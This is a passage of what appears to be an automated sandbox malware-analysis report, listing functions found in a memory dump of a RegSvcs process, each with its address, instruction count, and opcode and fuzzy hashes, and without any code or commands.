                                                                  • Instruction Fuzzy Hash: 6AB14F70A002658BDB64DF68CC90BE9B7F6EF44704F0486E9D54AA7381EB709D86CB35
                                                                  Function 016BE5E7 Relevance: .3, Instructions: 278COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
                                                                  • Instruction ID: 0ddd1fe1f2f1de4b93b2016c10e7ea1f097c4b28a973359ae757b562d6e6c2f5
                                                                  • Opcode Fuzzy Hash: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
                                                                  • Instruction Fuzzy Hash: DAA10832E006299FEB21DB58CC84FEEBBA5BB01714F1501A9EB11AB391D7749D81CBD1
                                                                  Function 016D0185 Relevance: .3, Instructions: 276COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e741ab4ec451d74afd58e15402d3ff084f036d4aa473d58f16392bfcc8e4debf
                                                                  • Instruction ID: 4b72a8398e5835f5635abc3997464b172a4b3ce6056465792a0cc2918979461d
                                                                  • Opcode Fuzzy Hash: e741ab4ec451d74afd58e15402d3ff084f036d4aa473d58f16392bfcc8e4debf
                                                                  • Instruction Fuzzy Hash: 31A1AE71F01716DBDB25CF69CD90BAAB7E5FF54318F104029EA4997282EB74E812CB90
                                                                  Function 01764500 Relevance: .3, Instructions: 275COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78df7135bdef1f7dc23e496ec256e988501367b5070dd73c120830a0a123d987
                                                                  • Instruction ID: 7d6be9d56f9fe0ad120eb33793ca204f4e4ea67e6767d510416be4a9811e5ed1
                                                                  • Opcode Fuzzy Hash: 78df7135bdef1f7dc23e496ec256e988501367b5070dd73c120830a0a123d987
                                                                  • Instruction Fuzzy Hash: 51A1CB72A44252AFC722DF18CD80B6ABBEAFF48704F55452CF98A9B651D334ED00CB95
                                                                  Function 01762B57 Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                  • Instruction ID: b092e742697ec3ca65cfaa8be75c14646c53376012d7e87798d35830902f759a
                                                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                  • Instruction Fuzzy Hash: 56B16871E0061ADFDF69CFA9C880AADFBB9FF58300F148169E914A7356D730A941CB94
                                                                  Function 017160E0 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16253a5779efc1b25de792e76499ae478b62540cf3e2e989bc151e7fdd0cbdb8
                                                                  • Instruction ID: ae01c403709fba617cc94792d7b4e5cf46386ed081c60abd6dc3740c6d7b0dde
                                                                  • Opcode Fuzzy Hash: 16253a5779efc1b25de792e76499ae478b62540cf3e2e989bc151e7fdd0cbdb8
                                                                  • Instruction Fuzzy Hash: 9791B171D00216AFDB15CFACD884BBEFBBAAB48710F154169F610EB345D7B4E9009BA4
                                                                  Function 016AE3F0 Relevance: .3, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e206ae1ba4acb885c2bafdc2380c26be4a429f0eda0738cbd0af93271de2645
                                                                  • Instruction ID: 2ed198d330200b44d87aa08271562acc1369622006f177d879250f8a4a5ed842
                                                                  • Opcode Fuzzy Hash: 9e206ae1ba4acb885c2bafdc2380c26be4a429f0eda0738cbd0af93271de2645
                                                                  • Instruction Fuzzy Hash: E4912431A006129BEB249B58DC40B7DBBA2EF94718F45806DFE459B380E736DD41CF61
                                                                  Function 016E6ACC Relevance: .2, Instructions: 226COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 418c9aef054bd5e354659d25587480bc07ce733783ae2440157c39dfaa096b7b
                                                                  • Instruction ID: c3c2d0d379ed522ce7834fc0a61f3c2a3609cfc4fdcbdf201acc88eafb8e3ce0
                                                                  • Opcode Fuzzy Hash: 418c9aef054bd5e354659d25587480bc07ce733783ae2440157c39dfaa096b7b
                                                                  • Instruction Fuzzy Hash: 4D81B171E016169BDB24CF69CC44ABEBBF9FB58700F04852EE445E7640E334D950CBA4
                                                                  Function 0175AB40 Relevance: .2, Instructions: 222COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                  • Instruction ID: c8137ccfdd30844ad5379c547ee9f45fd31695825a013c9ef7c30dd2e1feee72
                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                  • Instruction Fuzzy Hash: 09817031A0020A9FDF59DF59C894AAEFBF2BF84210F148669DD169B345DBB4E941CB80
                                                                  Function 016CE284 Relevance: .2, Instructions: 212COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 200821b60e83dfc9197f5c425ed03c549adb8ea5230a744cc6ae4b30951d7aef
                                                                  • Instruction ID: 2daae60172bb3cc25ae33fa1f4cfcdc935cca6df7a045c4257c4856da5527f1a
                                                                  • Opcode Fuzzy Hash: 200821b60e83dfc9197f5c425ed03c549adb8ea5230a744cc6ae4b30951d7aef
                                                                  • Instruction Fuzzy Hash: 13815D71A00609EFDB26CBA9C880BEEBBFAFF48714F10442DE559A7250D731AD45CB60
                                                                  Function 016AC640 Relevance: .2, Instructions: 206COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 154d3aa281406cc0dcebe9156f1359e71baa4fa3d25ad9e39ef0f9a2bb4eb2f1
                                                                  • Instruction ID: 284b37c49eeaf94577926a918dae72d698046f8d19d49491b0d2218f1883cb0b
                                                                  • Opcode Fuzzy Hash: 154d3aa281406cc0dcebe9156f1359e71baa4fa3d25ad9e39ef0f9a2bb4eb2f1
                                                                  • Instruction Fuzzy Hash: 4971AC75D04669DBCB25CF59C8907BEBBB5FF48710F64816EEA42AB390D7349801CBA0
                                                                  Function 017447A0 Relevance: .2, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5dec17ecf8943ab11cd2c5c70d3e41c949c779c6b8ea60481825d5c4f04f973
                                                                  • Instruction ID: c76028a1ae379e16100a5929aed817fc3d847873dbc38b53a5851b433bc8946a
                                                                  • Opcode Fuzzy Hash: f5dec17ecf8943ab11cd2c5c70d3e41c949c779c6b8ea60481825d5c4f04f973
                                                                  • Instruction Fuzzy Hash: 96717F70A40205FFDB20DF59D944B9EFBF9FB90710F11815AF601AB259D7319A80EB64
                                                                  Function 016A260B Relevance: .2, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 479173199e6ff1208624542c4b9a8056ab9c4f4e549fa71a7f97ca5a733de43f
                                                                  • Instruction ID: 110a1de5b4ddb02b612fc5a61c7dffd5b6732edda6a9f491dbcd6d3681a8252f
                                                                  • Opcode Fuzzy Hash: 479173199e6ff1208624542c4b9a8056ab9c4f4e549fa71a7f97ca5a733de43f
                                                                  • Instruction Fuzzy Hash: AB71CE366442528FD311DF2CC890B2ABBE5FF84310F4485AEE8998B352DB34DD46CBA1
                                                                  Function 0171035C Relevance: .2, Instructions: 198COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                  • Instruction ID: 8d741efb6066e382b8bcf5f6547c292f8e0f904408f53029d02bf0e7c808383d
                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                  • Instruction Fuzzy Hash: EE714C71A0061AEFDB10DFA9C984E9EFBB9FF48700F104569E505AB254EB34EE41CB94
                                                                  Function 017262A0 Relevance: .2, Instructions: 198COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 55b82021b6d4cb067ad3dc050646133fd593345346a3e8a06ae7751031cb54ae
                                                                  • Instruction ID: 2734e0ba694a27b94789bcc2bde40f3ef16b011918f348bda8303cb5423453ad
                                                                  • Opcode Fuzzy Hash: 55b82021b6d4cb067ad3dc050646133fd593345346a3e8a06ae7751031cb54ae
                                                                  • Instruction Fuzzy Hash: F771E032200721AFE7229F18CC54F5AFBA6EF44724F14442DFA968B2A1D775EA46CB50
                                                                  Function 01698AA0 Relevance: .2, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 047bcb506bd241e4e068df31059da2bd25088be9730c8651b48bcc6c5cc1e7b9
                                                                  • Instruction ID: 0e3b459d3092cecca822a3dcfda2b9bf1d7db5f13b427fca4e507072f506f572
                                                                  • Opcode Fuzzy Hash: 047bcb506bd241e4e068df31059da2bd25088be9730c8651b48bcc6c5cc1e7b9
                                                                  • Instruction Fuzzy Hash: FE818072A043168FDB24CF98D994B6E77B9BB49320F19812DDA01AB385C774DD41CF94
                                                                  Function 01768324 Relevance: .2, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a0bbb6a8b724cae34623544c920c68818a3b0a8f3af5ba04ceadce654aec678c
                                                                  • Instruction ID: 345f3285141eb173aebfff4b5c3c21bb87fa57074ba18e9abd122fe050d58de9
                                                                  • Opcode Fuzzy Hash: a0bbb6a8b724cae34623544c920c68818a3b0a8f3af5ba04ceadce654aec678c
                                                                  • Instruction Fuzzy Hash: 85712BB1E00209AFDF16DF95CC41FEEBBB9FB04350F104169EA11A7290E774AA05CB95
                                                                  Function 0174A250 Relevance: .2, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af3effef0eb23bd57e496e75f180316b7db9cbb62aeab94036f0f8bf4422f979
                                                                  • Instruction ID: 2e1fe1dab1a345c411f2ca4b286252c0fafe19b285ad5ab79dcd6b02a3c8d08a
                                                                  • Opcode Fuzzy Hash: af3effef0eb23bd57e496e75f180316b7db9cbb62aeab94036f0f8bf4422f979
                                                                  • Instruction Fuzzy Hash: 9751AD72944712AFD721DA6CC844E5BFBE9EBC5750F01492DBA42DB250D770ED04CBA2
                                                                  Function 01738350 Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bcdee6d03bc17d1092f22996a15624cfb41b12d0097e38ab70ecf660d29f44bc
                                                                  • Instruction ID: 73dd4817ea70bcd3a8e884e014a38e2d01a1d59b3f3e4218500a13b73ea3bcaf
                                                                  • Opcode Fuzzy Hash: bcdee6d03bc17d1092f22996a15624cfb41b12d0097e38ab70ecf660d29f44bc
                                                                  • Instruction Fuzzy Hash: 8B51E270900705EFD721CF6AC884AABFBF8BF94710F10471EE29297AA2C7B0A545CB51
                                                                  Function 016CE443 Relevance: .2, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5774d2aa71bc97b08cc340f588fc6998b9f3ecddfe843e31045d704029093191
                                                                  • Instruction ID: e6164e1c8a15949ee3762b75d783505eda0eb546ae7ff1715278390dc4984f42
                                                                  • Opcode Fuzzy Hash: 5774d2aa71bc97b08cc340f588fc6998b9f3ecddfe843e31045d704029093191
                                                                  • Instruction Fuzzy Hash: C2513971600A05EFCB22EF69CD80E6AB7FAFB14644F80046DE64697261D735ED41CB54
                                                                  Function 01734180 Relevance: .2, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 18c17b9b5f4b84a7a35cbacd954cb646d1816fe05cf4c82d35ffbe941e3f1e61
                                                                  • Instruction ID: 2759575b230cce6525bde69ed031db8ca1d08adae222b4c9a745ab3ca6b02a53
                                                                  • Opcode Fuzzy Hash: 18c17b9b5f4b84a7a35cbacd954cb646d1816fe05cf4c82d35ffbe941e3f1e61
                                                                  • Instruction Fuzzy Hash: 485158716083429FD758DF29C880A6BFBE6BFC8204F44492DF58AD7251EB30D905CB96
                                                                  Function 016B45B1 Relevance: .2, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                  • Instruction ID: e460faacd7087197ff856f5d709eebed0d67096c254d0039219ce6d715328888
                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                  • Instruction Fuzzy Hash: 26518271E0021AABDF15DF94C880BFEBBB6AF49354F144069EA02AB341DB34DD85CB94
                                                                  Function 0171E9E0 Relevance: .2, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                  • Instruction ID: 9a152f4d04a7e7388fcd2ea200f1db84f1a1554d91980a144d1c2ff37072638a
                                                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                  • Instruction Fuzzy Hash: E7517571D0021AABEF229A9CCC94FAEFB75BF00724F154669DD1267194DB709E408BA0
                                                                  Function 01758B28 Relevance: .2, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5349c9eb32984d182fe7f11764aa96dd80cd230786c2bb6cd55a0f86d6f00b13
                                                                  • Instruction ID: bf247214983a1f971264293d4a7ca9bae79f8b9d799d1d0c3b253939b4bac523
                                                                  • Opcode Fuzzy Hash: 5349c9eb32984d182fe7f11764aa96dd80cd230786c2bb6cd55a0f86d6f00b13
                                                                  • Instruction Fuzzy Hash: 7141F8707056119BEBA9DB2EC894B7BFB9AEF90220F048259FD5587385DBB0D801C793
                                                                  Function 0171CBF0 Relevance: .1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b16f6abb709ecb0d65d30a3a099984b2a3cab87c3e012686fe7e82dcb6738133
                                                                  • Instruction ID: be30c9564ac36d461ae871c9cfdd71ee4d26c3bf0e310b0d7d8c8ffa1105824f
                                                                  • Opcode Fuzzy Hash: b16f6abb709ecb0d65d30a3a099984b2a3cab87c3e012686fe7e82dcb6738133
                                                                  • Instruction Fuzzy Hash: EB519071A80215EFCB21DFADC98099EFBB9FF48324B608519E545A3709D730AD41CF90
                                                                  Function 016CA430 Relevance: .1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef3e1af4771121519811c47e10d3c9a1e7adbfe2523508c09f540daa7f47ae3c
                                                                  • Instruction ID: 23ae2d77778dfafa44e40ef898d83a9deb714365d1adecd04849321b2c2ac0d5
                                                                  • Opcode Fuzzy Hash: ef3e1af4771121519811c47e10d3c9a1e7adbfe2523508c09f540daa7f47ae3c
                                                                  • Instruction Fuzzy Hash: 5E412B71684305DBDB25EFA8DC90F7E77A5EB94B28F40802DFE069B241E7719811C754
                                                                  Function 0175A9D3 Relevance: .1, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                  • Instruction ID: bb9d7355b4625c83d458dffd9fae85cfe8e9ee63747454e71dad7ef87a5df561
                                                                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                  • Instruction Fuzzy Hash: A641E671A007169FDB65CF68C984A6AF7A9FF80210B05877EED5287640EB70EE14CBD0
                                                                  Function 016C01F8 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85673c3f902a4e772b7517cb8e729261109b74446d8b5e9ff63b9076a3ef9258
                                                                  • Instruction ID: 22f3c042ae70de3d82858bae03e4dbf911abff0d74f884a39de38a2a15fc7316
                                                                  • Opcode Fuzzy Hash: 85673c3f902a4e772b7517cb8e729261109b74446d8b5e9ff63b9076a3ef9258
                                                                  • Instruction Fuzzy Hash: 85419B39901216DBDB11DFA8C840AFEB7B6FF48A10F14815EF815A7340D7359D42CBA8
                                                                  Function 016BEBFC Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c1af2782ab150c1cd0aa750e852d340a2d422b448476eab873a3a1c6643a96f
                                                                  • Instruction ID: 4dd2e90142e8afb9ed268fa05110aa71c4bdd565369e3fedbe4d763f63954322
                                                                  • Opcode Fuzzy Hash: 6c1af2782ab150c1cd0aa750e852d340a2d422b448476eab873a3a1c6643a96f
                                                                  • Instruction Fuzzy Hash: D741E5722043019FD721DF28CC80AABB7E6FF84224F10486DE667C3752EB71E8858B55
                                                                  Function 016D2750 Relevance: .1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                  • Instruction ID: ddfc52dc4695559a763ef42f87851d71510e4b1d6ace749939fdac3f9281cca2
                                                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                  • Instruction Fuzzy Hash: 35511575A00615CFDB16CF9CC580AAEF7F2FF84710F2981A9D915A7391D770AA82CB90
                                                                  Function 01696154 Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5ab336ae951a1305530b193048a30417e8af4919b1da989db6e96b24ab7d62a
                                                                  • Instruction ID: 8c560782231293811852e27d941044c255ac289a1bac81d1e5195a9862a320df
                                                                  • Opcode Fuzzy Hash: c5ab336ae951a1305530b193048a30417e8af4919b1da989db6e96b24ab7d62a
                                                                  • Instruction Fuzzy Hash: 3C51F6B0944206DBDF259B28CC10BA8BBB6FF11314F1482EDE529A77C2D7349981CF84
                                                                  Function 01690BCD Relevance: .1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a8410b2796410a034b282cc4524011cf6416ea1233af6debe68f37513c29117
                                                                  • Instruction ID: 63cdc39a9d180d327dc573783fd86b2ac2b52b336eb5b9c152f4da979beaee09
                                                                  • Opcode Fuzzy Hash: 4a8410b2796410a034b282cc4524011cf6416ea1233af6debe68f37513c29117
                                                                  • Instruction Fuzzy Hash: 7F41AD32A40268DBCF21DF68CD44BEA77B9EF44740F4101AAE909AB341DB359E81CF95
                                                                  Function 0175866E Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
